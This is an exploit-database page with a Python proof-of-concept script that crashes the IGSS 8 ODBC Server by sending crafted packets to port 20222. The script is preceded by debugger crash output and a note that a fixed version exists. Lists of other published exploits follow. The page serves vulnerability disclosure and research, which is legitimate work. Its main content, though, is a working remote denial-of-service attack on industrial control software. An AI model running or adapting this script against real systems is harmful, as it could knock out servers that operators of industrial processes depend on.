Menu

Search for hundreds of thousands of exploits

"IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities"

Author

Exploit author

"Jeremy Brown"

Platform

Exploit platform

windows

Release date

Exploit published date

2011-03-23

Download file

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
#!/usr/bin/python
# igss.py
# IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS
# Jeremy Brown / jbrown at patchtuesday dot org
# Mar 2011
#
# There are multiple remote uninitialized pointer free conditions in IGSS's ODBC
# server. By sending a specially crafted packet to listening port 20222, it is
# possible to crash the server. Execution of arbitrary code is unlikely.
#
# Note: IGSS uses a 3rd party ODBC driver kit from Dr. DeeBee.
#
# HEAP[Odbcixv8se.exe]: Invalid allocation size - 8899AABB (exceeded 7ffdefff)
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:002> g
# HEAP[Odbcixv8se.exe]: Invalid Address specified to RtlGetUserInfoHeap( 00150000, 00175008 )
# (f10.cf8): Break instruction exception - code 80000003 (first chance)
# eax=00175000 ebx=00175000 ecx=7c91ead5 edx=0102fc55 esi=00150000 edi=00175008
# eip=7c90120e esp=0102fe58 ebp=0102fe5c iopl=0         nv up ei pl nz na po nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00000202
# ntdll!DbgBreakPoint:
# 7c90120e cc              int     3
# 0:002> g
# Heap corruption detected at 00175008
# Heap corruption detected at 00177F78
# Heap corruption detected at 001733D8
# (f10.cf8): Access violation - code c0000005 (first chance)
# First chance exceptions are reported before any exception handling.
# This exception may be expected and handled.
# eax=00173398 ebx=00000000 ecx=feeefeee edx=001733d8 esi=00173390 edi=00150000
# eip=7c9276fc esp=0102fc34 ebp=0102fd08 iopl=0         nv up ei pl zr na pe nc
# cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010246
# ntdll!RtlFreeHeapSlowly+0x392:
# 7c9276fc 8901            mov     dword ptr [ecx],eax  ds:0023:feeefeee=????????
# 0:002> kb
# ChildEBP RetAddr  Args to Child              
# 0102fd08 7c96f85a 00150000 50000061 00173398 ntdll!RtlFreeHeapSlowly+0x392
# 0102fd7c 7c94bc4c 00150000 50000061 00173398 ntdll!RtlDebugFreeHeap+0x193
# 0102fe64 7c927573 00150000 40000061 00173398 ntdll!RtlFreeHeapSlowly+0x37
# 0102ff34 7c80fd4f 00150000 00000001 00173398 ntdll!RtlFreeHeap+0xf9
# *** ERROR: Module load completed but symbols could not be loaded for Odbcixv8se.exe
# 0102ff7c 0044531d 00aa001c 0102ffb4 00443abd kernel32!GlobalFree+0xb5
# WARNING: Stack unwind information not available. Following frames may be wrong.
# 0102ff88 00443abd 00173398 00000014 00000016 Odbcixv8se+0x4531d
# 0102ffb4 7c80b729 00000710 00000000 00000000 Odbcixv8se+0x43abd
# 0102ffec 00000000 004436f0 00000710 00000000 kernel32!BaseThreadStart+0x37
#
# feeefeee = freed memory
#
# RtlFreeHeap() takes three arguments:
# HeapHandle --> 0x173398
# Flags      --> 0x00000001
# HeapBase   --> 0x173398
#
# HeapBase is the pointer to the memory block that is going to be freed.
#
# 0:002> dd 173398
# 00173398  001733d8 -----------------------------
# 001733a8  feeefeee feeefeee feeefeee feeefeee  -
# 001733b8  feeefeee feeefeee feeefeee feeefeee  -
# 001733c8  feeefeee feeefeee feeefeee feeefeee  -
# 001733d8  feeefeee feeefeee feeefeee feeefeee <-
# 001733e8  feeefeee feeefeee feeefeee feeefeee
# 001733f8  feeefeee feeefeee feeefeee feeefeee
# 00173408  feeefeee feeefeee feeefeee feeefeee
#
# In this example, the pointer to free happens to point to free memory.
#
# Tested IGSS 8 (Odbcixv8se.exe version 10299) on Windows
#
# Fixed version: IGSS 8 (Odbcixv8se.exe version 11003)
# http://www.syware.com/download/drdeebee/gold_bug.txt
#

import sys
import socket

req_1=(
"\x00\x00\x00\x34"
"\x02\x00\x00\x00\x02\x00\x00\x00\x02\x2e\x00\x00\x00\x00\x19\x49"
"\x47\x53\x53\x33\x32\x76\x38\x20\x4f\x44\x42\x43\x20\x4e\x65\x74"
"\x77\x6f\x72\x6b\x20\x44\x53\x00\x00\x00\x00\x02\x20\x00\x00\x00"
"\x00\x02\x20\x00"
)

req_2=(
"\x00\x00\x00\xff"+  # length
"\x16"+              # switch code
"\x77" * 254+        # begin query here
"\x88\x99\xaa\xbb"   # test
)

if len(sys.argv)!=2:
     print "Usage: %s <target>" % sys.argv[0]
     sys.exit(0)

target=sys.argv[1]
port=20222
cs=target,port

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect(cs)
sock.settimeout(1)

sock.send(req_1)

try:
     resp=sock.recv(1024)
     print "resp_1 = %s\n"%resp.encode("hex")
except: pass

sock.send(req_2)

try:
     resp=sock.recv(1024)
     print "resp_2 = %s\n"%resp.encode("hex")
except: pass

sock.close()
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "Anuko Time Tracker 1.19.23.5311 - No rate Limit on Password Reset functionality" webapps php "Mufaddal Masalawala"
2020-12-02 "Ksix Zigbee Devices - Playback Protection Bypass (PoC)" remote multiple "Alejandro Vazquez Vazquez"
2020-12-02 "Mitel mitel-cs018 - Call Data Information Disclosure" remote linux "Andrea Intilangelo"
2020-12-02 "Artworks Gallery 1.0 - Arbitrary File Upload RCE (Authenticated) via Edit Profile" webapps multiple "Shahrukh Iqbal Mirza"
2020-12-02 "ChurchCRM 4.2.0 - CSV/Formula Injection" webapps multiple "Mufaddal Masalawala"
2020-12-02 "DotCMS 20.11 - Stored Cross-Site Scripting" webapps multiple "Hardik Solanki"
2020-12-02 "ChurchCRM 4.2.1 - Persistent Cross Site Scripting (XSS)" webapps multiple "Mufaddal Masalawala"
2020-12-02 "NewsLister - Authenticated Persistent Cross-Site Scripting" webapps multiple "Emre Aslan"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
Release Date Title Type Platform Author
2020-12-02 "aSc TimeTables 2021.6.2 - Denial of Service (PoC)" local windows "Ismael Nava"
2020-12-02 "IDT PC Audio 1.0.6433.0 - 'STacSV' Unquoted Service Path" local windows "Manuel Alvarez"
2020-12-02 "PRTG Network Monitor 20.4.63.1412 - 'maps' Stored XSS" webapps windows "Amin Rawah"
2020-12-02 "Microsoft Windows - Win32k Elevation of Privilege" local windows nu11secur1ty
2020-12-01 "Global Registration Service 1.0.0.3 - 'GREGsvc.exe' Unquoted Service Path" local windows "Emmanuel Lujan"
2020-12-01 "Pearson Vue VTS 2.3.1911 Installer - VUEApplicationWrapper Unquoted Service Path" local windows Jok3r
2020-12-01 "Intel(r) Management and Security Application 5.2 - User Notification Service Unquoted Service Path" local windows "Metin Yunus Kandemir"
2020-12-01 "10-Strike Network Inventory Explorer 8.65 - Buffer Overflow (SEH)" local windows Sectechs
2020-12-01 "EPSON Status Monitor 3 'EPSON_PM_RPCV4_06' - Unquoted Service Path" local windows SamAlucard
2020-11-30 "YATinyWinFTP - Denial of Service (PoC)" remote windows strider
Release Date Title Type Platform Author
2019-10-15 "Podman & Varlink 1.5.1 - Remote Code Execution" remote linux "Jeremy Brown"
2019-10-14 "Ajenti 2.1.31 - Remote Code Execution" webapps python "Jeremy Brown"
2016-12-06 "Windows 10 (x86/x64) WLAN AutoConfig - Denial of Service (PoC)" dos windows "Jeremy Brown"
2016-12-04 "BlackStratus LOGStorm 4.5.1.35/4.5.1.96 - Remote Code Execution" remote hardware "Jeremy Brown"
2015-06-10 "Libmimedir - '.VCF' Memory Corruption (PoC)" dos linux "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Facebook Access Token" webapps hardware "Jeremy Brown"
2015-06-03 "Seagate Central 2014.0410.0026-F - Remote Command Execution" remote hardware "Jeremy Brown"
2015-05-20 "Comodo GeekBuddy < 4.18.121 - Local Privilege Escalation" local windows "Jeremy Brown"
2015-01-28 "ClearSCADA - Remote Authentication Bypass" remote windows "Jeremy Brown"
2011-06-07 "IBM Tivoli Endpoint 4.1.1 - Remote SYSTEM" remote windows "Jeremy Brown"
2011-03-23 "Progea Movicon 11 - 'TCPUploadServer' Remote File System" remote windows "Jeremy Brown"
2011-03-23 "IGSS 8 ODBC Server - Multiple Remote Uninitialized Pointer Free Denial of Service Vulnerabilities" dos windows "Jeremy Brown"
2011-01-25 "Automated Solutions Modbus/TCP OPC Server - Remote Heap Corruption (PoC)" dos windows "Jeremy Brown"
2011-01-14 "Objectivity/DB - Lack of Authentication" dos windows "Jeremy Brown"
2010-12-18 "Ecava IntegraXor Remote - ActiveX Buffer Overflow (PoC)" dos windows "Jeremy Brown"
2010-09-16 "BACnet OPC Client - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-12 "Mozilla Codesighs - Memory Corruption" local linux "Jeremy Brown"
2009-12-07 "gAlan 0.2.1 - Local Buffer Overflow (1)" local windows "Jeremy Brown"
2009-12-07 "Polipo 1.0.4 - Remote Memory Corruption (PoC)" dos linux "Jeremy Brown"
2009-11-16 "Apple Safari 4.0.3 (Windows x86) - 'CSS' Remote Denial of Service (1)" dos windows_x86 "Jeremy Brown"
2009-10-28 "Mozilla Firefox 3.5.3 - Local Download Manager Temp File Creation" local windows "Jeremy Brown"
2009-10-06 "Geany .18 - Local File Overwrite" local linux "Jeremy Brown"
2009-09-24 "Sun Solaris 10 RPC dmispd - Denial of Service" dos solaris "Jeremy Brown"
2009-09-09 "GemStone/S 6.3.1 - 'stoned' Local Buffer Overflow" local linux "Jeremy Brown"
2009-09-09 "Ipswitch WS_FTP 12 Professional - Remote Format String (PoC)" dos windows "Jeremy Brown"
2009-09-09 "Apple Safari 3.2.3 (Windows x86) - JavaScript 'eval' Remote Denial of Service" dos windows_x86 "Jeremy Brown"
2009-07-21 "Adobe Acrobat 9.1.2 NOS - Local Privilege Escalation" local windows "Jeremy Brown"
2009-05-07 "GrabIt 1.7.2x - NZB DTD Reference Buffer Overflow" local windows "Jeremy Brown"
2009-03-12 "POP Peeper 3.4.0.0 - Date Remote Buffer Overflow" remote windows "Jeremy Brown"
2009-02-27 "POP Peeper 3.4.0.0 - UIDL Remote Buffer Overflow (SEH)" remote windows "Jeremy Brown" 
import requests
response = requests.get('http://127.0.0.1:8181?format=json')

For full documentation follow the link above

Cipherscan. Find out which SSL ciphersuites are supported by a target.

Cipher Protocols Sigalg Trusted

Identify and fingerprint Web Application Firewall (WAF) products protecting a website.

Host WAF detected